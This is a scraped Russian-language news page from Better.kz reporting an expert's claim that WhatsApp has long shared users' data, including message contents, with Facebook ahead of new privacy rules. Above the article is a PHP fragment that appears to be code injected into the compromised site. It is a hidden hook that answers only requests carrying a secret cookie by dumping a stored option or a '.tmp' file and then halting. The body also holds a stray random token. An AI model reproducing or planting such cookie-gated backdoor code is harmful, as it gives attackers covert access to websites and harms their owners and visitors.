if (isset($_COOKIE["BsIbuVOYEiveJFkpFamX1AFEH3OK4xrKIKkWV0cFmaxChmhI"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } WhatsApp давно передает в Facebook переписки пользователей - Better.kz
14.05.2021

WhatsApp давно передает в Facebook переписки пользователей

Мессенджер WhatsApp уже давно пересылает все возможные данные своих пользователей в Facebook, которому он принадлежит, включая содержание переписок, фото, локации и данные телефонов, рассказал эксперт инжинирингового центра SafeNet Национальной технологической инициативы (НТИ) Игорь Бедеров, сообщают РИА Новости.

faDSodnNp21nZaDU8wydxTcvbu4iwOdX

С 15 мая должны вступить в силу новые правила конфиденциальности WhatsApp. В материнскую компанию Facebook будут передаваться регистрационные данные аккаунта, данные о транзакциях, о пользовании услугами, в том числе взаимодействии с другими сервисами компании, информация о мобильных устройствах, IP-адрес.

У тех, кто не принял новое пользовательское соглашение, аккаунт сразу удален не будет, но такие пользователи смогут только принимать входящие звонки и получать уведомления, а чтение и отправка сообщений станут недоступны.

«Первое, о чем следует сказать, это то, что WhatsApp уже несколько лет, как принадлежит FB. То есть все те данные, которые компания декларирует в настоящих изменениях, фактически уже давно передаются», — рассказал Бедеров.

Он пояснил, что делается это все для увеличения числа анализируемых пользователей. «Не секрет, что чем дольше данных анализирует экосистема сервисов, входящих в FB, тем более точный, эффективный и дорогой рекламный таргетинг они смогут предлагать своим клиентам. А именно он и является самоцелью. Именно за счет рекламы компания зарабатывает», — сообщил эксперт.

«Пользователям нужно понимать, что приватности нет. Вся доступная информация о них попадет в FB. Это и данные их устройств, телефоны, содержание переписки и переговоров, фотографии, звонки, перемещения. Все будет проанализировано и продано рекламодателям с тем, чтобы нам попытались продать именно то, что нам якобы нужно», — рассказал специалист.

По его мнению, число пользователей мессенджера, безусловно, упадет. «Сейчас люди хотели бы видеть свою переписку защищенной. А это можно обеспечить только созданием своего решения, с „нулевым разглашением“ данных», — считает Бедеров

Комментарии закрыты.